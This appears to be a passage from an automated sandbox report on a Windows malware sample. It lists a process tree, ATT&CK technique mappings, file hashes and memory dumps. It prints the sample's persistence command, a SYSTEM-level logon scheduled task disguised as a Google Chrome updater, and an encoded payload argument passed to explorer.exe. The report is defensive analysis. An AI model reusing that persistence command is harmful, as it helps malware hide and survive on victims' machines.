"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineGNC" /tr "\"C:\Program Files\Google\Chrome\updaterchr.exe\""
3⤵
PID:1768

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineGNC" /tr "\"C:\Program Files\Google\Chrome\updaterchr.exe\""
4⤵
- Creates scheduled task(s)
PID:1776

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "fysugqofvxbu"
3⤵
PID:2032

C:\Windows\explorer.exe
C:\Windows\explorer.exe luvbvasixu0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/gWCF8syjnqONW8nAkIDCaiX6JyJkuCgTuOQv8CpGeKv1VALuliP/ha8Yjhtr6HMGk2rtUy+qneh6aJBuRE2Vl54snxeUp5YsY49VDdIyEysvbl9BsEUC35mC2kOBCmxC0JxCaQIXPdfkaqqK0slLenN1msO3trj6XDK8r1gefSJa5eSdUWn80xUbCsMx+vSBw/fgeBKOpIbO3PFsHY47GpDwiBS4J/sfvFzm9Z81e/R0fe5W8jG0UPs4d7gICDhbEElYG2jSwHbK0S6OPBDvA3oFTND9PNmzn3LH3zqfX+EJgpyL3wpnaD8+/S5pVbXlPPzIOFzSPhPY04QJRRPj7g==
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
9e97fb2695d962c6323739e02ad343b8

SHA1
f8678637e6e0b049990515fe5b86d7e1c899c64c

SHA256
aa28ac9b1e05ad85bc79a9a75157240ac15b9c16d6e66404b981a299cfcfa6e2

SHA512
373a98b305140a42e99e7f5c0862ef83dd1b2d2546b6d9e64dfa82bb0efc8609f4a36b8cb9e0f52be8b4e76ee4a23586a8042a67eb888285a8045dcbd1f0baaf

Download Submit
\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
\Windows\System32\config\systemprofile\AppData\Roaming\F90F.tmp

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/316-69-0x0000000000000000-mapping.dmp

Download
memory/392-128-0x0000000000000000-mapping.dmp

Download
memory/392-83-0x0000000000000000-mapping.dmp

Download
memory/544-111-0x0000000000000000-mapping.dmp

Download
memory/548-78-0x0000000000000000-mapping.dmp

Download
memory/556-145-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/556-146-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/556-144-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/556-143-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/556-147-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/568-123-0x0000000000000000-mapping.dmp

Download
memory/580-102-0x0000000000000000-mapping.dmp

Download
memory/600-110-0x0000000000000000-mapping.dmp

Download
memory/640-64-0x0000000000000000-mapping.dmp

Download
memory/676-68-0x0000000000000000-mapping.dmp

Download
memory/844-131-0x0000000000000000-mapping.dmp

Download
memory/848-90-0x000000013F6A0000-0x000000013FAEA000-memory.dmp

Filesize
4.3MB

Download
memory/848-87-0x0000000000000000-mapping.dmp

Download
memory/848-139-0x0000000000920000-0x000000000092A000-memory.dmp

Filesize
40KB

Download
memory/944-127-0x0000000000000000-mapping.dmp

Download
memory/964-85-0x0000000000000000-mapping.dmp

Download
memory/972-79-0x0000000000000000-mapping.dmp

Download
memory/984-62-0x00000000027C4000-0x00000000027C7000-memory.dmp

Filesize
12KB

Download
memory/984-61-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/984-60-0x00000000027C4000-0x00000000027C7000-memory.dmp

Filesize
12KB

Download
memory/984-59-0x000007FEECAA0000-0x000007FEED5FD000-memory.dmp

Filesize
11.4MB

Download
memory/984-63-0x00000000027CB000-0x00000000027EA000-memory.dmp

Filesize
124KB

Download
memory/984-58-0x000007FEED600000-0x000007FEEE023000-memory.dmp

Filesize
10.1MB

Download
memory/984-56-0x0000000000000000-mapping.dmp

Download
memory/1000-96-0x0000000000000000-mapping.dmp

Download
memory/1008-124-0x0000000000000000-mapping.dmp

Download
memory/1016-77-0x0000000000000000-mapping.dmp

Download
memory/1028-116-0x0000000000000000-mapping.dmp

Download
memory/1044-119-0x0000000000000000-mapping.dmp

Download
memory/1048-54-0x000000013FA30000-0x000000013FE7A000-memory.dmp

Filesize
4.3MB

Download
memory/1048-55-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

Filesize
8KB

Download
memory/1076-70-0x0000000000000000-mapping.dmp

Download
memory/1076-105-0x0000000000000000-mapping.dmp

Download
memory/1120-66-0x0000000000000000-mapping.dmp

Download
memory/1136-113-0x0000000000000000-mapping.dmp

Download
memory/1196-93-0x0000000000000000-mapping.dmp

Download
memory/1196-130-0x0000000000000000-mapping.dmp

Download
memory/1244-101-0x0000000001164000-0x0000000001167000-memory.dmp

Filesize
12KB

Download
memory/1244-100-0x000007FEEC5F0000-0x000007FEED14D000-memory.dmp

Filesize
11.4MB

Download
memory/1244-92-0x0000000000000000-mapping.dmp

Download
memory/1244-108-0x0000000001164000-0x0000000001167000-memory.dmp

Filesize
12KB

Download
memory/1244-109-0x000000000116B000-0x000000000118A000-memory.dmp

Filesize
124KB

Download
memory/1252-121-0x0000000000000000-mapping.dmp

Download
memory/1320-129-0x0000000000000000-mapping.dmp

Download
memory/1344-115-0x0000000000000000-mapping.dmp

Download
memory/1460-94-0x0000000000000000-mapping.dmp

Download
memory/1468-103-0x0000000000000000-mapping.dmp

Download
memory/1488-120-0x0000000000000000-mapping.dmp

Download
memory/1508-137-0x0000000000000000-mapping.dmp

Download
memory/1532-84-0x0000000000000000-mapping.dmp

Download
memory/1564-114-0x0000000000000000-mapping.dmp

Download
memory/1568-82-0x0000000000000000-mapping.dmp

Download
memory/1588-122-0x0000000000000000-mapping.dmp

Download
memory/1596-125-0x0000000000000000-mapping.dmp

Download
memory/1620-80-0x0000000000000000-mapping.dmp

Download
memory/1684-67-0x0000000000000000-mapping.dmp

Download
memory/1684-104-0x0000000000000000-mapping.dmp

Download
memory/1696-65-0x0000000000000000-mapping.dmp

Download
memory/1764-99-0x0000000000000000-mapping.dmp

Download
memory/1768-97-0x0000000000000000-mapping.dmp

Download
memory/1768-134-0x0000000000000000-mapping.dmp

Download
memory/1776-135-0x0000000000000000-mapping.dmp

Download
memory/1784-81-0x0000000000000000-mapping.dmp

Download
memory/1804-138-0x0000000000000000-mapping.dmp

Download
memory/1808-112-0x0000000000000000-mapping.dmp

Download
memory/1808-72-0x0000000000000000-mapping.dmp

Download
memory/1860-106-0x0000000000000000-mapping.dmp

Download
memory/1860-71-0x0000000000000000-mapping.dmp

Download
memory/1916-73-0x0000000000000000-mapping.dmp

Download
memory/1932-118-0x0000000000000000-mapping.dmp

Download
memory/1940-117-0x0000000000000000-mapping.dmp

Download
memory/1944-126-0x0000000000000000-mapping.dmp

Download
memory/1948-74-0x0000000000000000-mapping.dmp

Download
memory/1952-107-0x0000000000000000-mapping.dmp

Download
memory/2000-76-0x0000000000000000-mapping.dmp

Download
memory/2004-133-0x0000000000000000-mapping.dmp

Download
memory/2016-75-0x0000000000000000-mapping.dmp

Download
memory/2032-140-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/2032-141-0x0000000000200000-0x0000000000206000-memory.dmp

Filesize
24KB

Download
memory/2044-136-0x0000000000000000-mapping.dmp

Download